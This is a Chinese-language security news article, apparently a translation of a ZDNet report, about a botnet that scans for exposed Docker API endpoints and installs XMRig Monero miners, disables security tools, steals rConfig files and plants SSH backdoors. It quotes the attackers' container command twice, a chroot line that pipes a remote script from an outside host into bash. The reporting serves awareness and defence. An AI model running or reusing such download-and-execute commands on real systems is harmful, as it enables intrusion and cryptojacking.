阿里云「飞天发布时刻」2024来啦!新产品、新特性、新能力、新方案,等你来探~ 了解详情
写点什么

黑客组织劫持 Docker 系统挖掘加密货币

  • 2019-11-29
  • 本文字数:1436 字

    阅读完需:约 5 分钟

黑客组织劫持 Docker 系统挖掘加密货币


现在都快 2020 年了,但还有不少系统管理员,仍然将 Docker 管理端口暴露在互联网上。


目前,有家黑客组织正在互联网上进行大规模的扫描,试图寻找那些在互联网上暴露了 API 端点的 Docker 平台。


黑客组织这次扫描行动的目的,是让他们能够向 Docker 实例发送命令,并在公司的 Docker 实例上部署加密货币挖矿程序,最终利用他们的算力进行挖矿,从而为黑客组织自身带来利益。

专业行动

这次大规模扫描行动于 11 月 24 日开始,由于扫描行动的规模极其庞大,因此一开始就立即引起了人们的注意。


Bad Packets LLC 的首席研究官兼联合创始人 Troy Mursch 对 ZDNet 称:“Bad Packets CTI API 的用户应该清楚利用暴露的 Docker 实例进行攻击并非什么新鲜事,而且这种行为经常发生。”


他指出,“黑客组织这次行动的不同之处在于,他们这次扫描行动规模特别夸张。仅此一点,就值得我们进一步调查,分析他们利用僵尸网络的意图究竟是什么。”


作为本次扫描行动的发现者,Mursch 说:“正如其他人指出的,这次行动的规模可不是那种脚本攻击的小孩把戏。黑客组织在这次扫描行动中投入了大量精力,但我们还没有搞清楚他们到底想干什么。”


推特用户 Bad Packets Report(@bad_packets)在 11 月 25 日发推文称:


这是一场扫描互联网上暴露的 Docker API 端点的随机性大规模扫描行动。

这些扫描行动利用 Alpine Linux 映像来创建一个容器,并通过以下方式执行有效负载:

"Command": chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'


目前我们所掌握的情况

到目前为止,我们所知道的是,这些攻击背后的组织正在扫描超过 59000 个 IP 网络(网络块),试图寻找暴露的 Docker 实例。


一旦黑客组织识别出暴露的主机后,攻击者就会使用 API 端点启动 Alpine Linux OS 容器,并在其中执行以下命令:


chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;
复制代码


上面的命令从攻击者的服务器下载并运行一份 Bash 脚本。这个脚本的作用就是在目标设备上安装一个经典 XMRRig 加密货币的挖矿程序。Mursch 指出,在这次行动开始后的两天,黑客组织已经挖出了 14.82 枚门罗币(XMR),其价格略高于 740 美元。



此外,Mursch 还发现,这种恶意扫描行动还有某种自我防御的机制。


Mursch 告诉我们:“这次黑客行动,虽然并非原创,但我们观察到一个有趣的情况,就是黑客组织会从 http://ix.io/1XQh 下载脚本来卸载已知的监视代理程序并杀死大量相关进程。”


Mursch 通过检查这个脚本,还发现黑客组织不仅正在试图禁用安全产品,还关闭了与竞争对手的加密货币挖矿僵尸网络(如 DDG)相关的 LSO 进程。


此外,Mursch 还发现,这个恶意脚本还有一个功能,就是它能够通过扫描受感染的主机来查找 rConfig 配置文件,并对其进行加密和窃取,然后将文件发送回黑客组织的服务器(一般是僵尸网络)。


此外,Sandfly Security 的创始人 Craig H. Rowland 也注意到,黑客组织还在被入侵的容器上创建后门账户,并留下 SSH 密钥以便更方便他们日后进行访问,这样,他们就可以从远程控制所有受感染的肉鸡目标。


Mursch 建议,运行 Docker 实例的用户和组织,应立即检查自己是否在互联网上公开了 API 端点,如果已经公开,就立即关闭端口,然后关停无法识别的运行中的容器。


作者介绍:


Catalin Cimpanu,ZDNet 的信息安全记者,负责报道网络安全、数据泄露、黑客攻击和其他相关话题。此前曾担任 Bleeping Computer 和 Softpedia 的信息安全记者。


原文链接:


A hacking group is hijacking Docker systems with exposed API endpoints


2019-11-29 13:531577

评论

发布
暂无评论
发现更多内容

uni-app 打包ios上架app store流程

Presto+Alluxio数据平台实战

数新网络官方账号

大数据

大型企业资金管理常见6个难题,用友Fast by BIP“快速”破解

用友BIP

资金管理

如何使用电商平台API接口?

技术冰糖葫芦

API API Gateway API 文档

CAKE OF FORTUNE(蛋糕矿工)BSC链系统开发

l8l259l3365

GitKraken for Mac(跨平台Git客户端)v9.10.0激活版下载

iMac小白

线上ES集群参数配置引起的业务异常案例分析

EquatorCoco

搜索引擎 数据 集群 异常测试

springboot集成工作流实例分享(源码)

金陵老街

数字化供应链助力电子产业高质量发展,华秋2023电子设计与制造技术研讨会成功举办!

华秋电子

PCB设计

最强模型GPT-4 Turbo来了,程序员会失业吗?

伤感汤姆布利柏

人工智能 低代码 chatpt GPT-4 Turbo

WebSocket 鉴权实战经验分享

Liam

程序员 前端 后端 网络协议 websocket

耐世特与Tactile Mobility合作的路面探测与早期预警软件获创新奖

财见

C/C++ 开发SCM服务管理组件

不在线第一只蜗牛

c 开发语言 c++、

CameraBag Pro for Mac(专业的图像处理工具)v2024.0.1激活版

iMac小白

拒绝连锡!3种偷锡焊盘轻松拿捏

华秋电子

PCBA

保姆级连接FusionInsight MRS kerberos Hive

数新网络官方账号

Java hive 华为云 Dbeaver

SRM采购招投标一体化系统(源码)

金陵老街

招投标 SRM系统 采购系统 供应商管理系统

uniapp打包的ipa上架到appstore的傻瓜式教程

雪奈椰子

Redis桌面管理工具: Redis Desktop Manager for Mac中文激活版下载

iMac小白

DreamPlan Plus for Mac(房屋装修设计)v8.61激活版下载

iMac小白

云服务器入门指南:你需要知道的基础知识与选择策略

一只扑棱蛾子

云服务器

【网易云商】构建高效 SaaS 系统的技术要点与最佳实践

网易云信

SaaS 平台

uniapp打包的ipa上架到appstore的傻瓜式教程

雪奈椰子

如何调用电商API接口获取相关商品的推荐列表?

技术冰糖葫芦

API API 文档

After Effects 2024 for Mac(AE2024视频特效)v24.0.3中文版

mac

苹果mac Windows软件 视频处理软件 After Effects 2024 AE2024

低代码平台提升软件开发效率

互联网工科生

软件开发 低代码 JNPF

Comsol Multiphysics for Mac(物理数值模拟仿真软件)v6.2中文激活版

iMac小白

欢迎提报 | 2023年龙蜥社区优秀贡献者评选正式启动

OpenAnolis小助手

操作系统 创新 龙蜥社区 优秀贡献者

特斯拉开源 Roadster 文件随便用;微软 Copilot AI 技术开放或不对大陆开放丨 RTE 开发者日报 Vol.92

声网

Timemator for Mac(自动化时间跟踪软件) 3.0.4汉化激活版

mac

苹果mac Windows软件 Timemator 时间跟踪软件

基于低代码平台搭建应用程序

树上有只程序猿

软件开发 低代码 JNPF

黑客组织劫持 Docker 系统挖掘加密货币_区块链_Catalin Cimpanu_InfoQ精选文章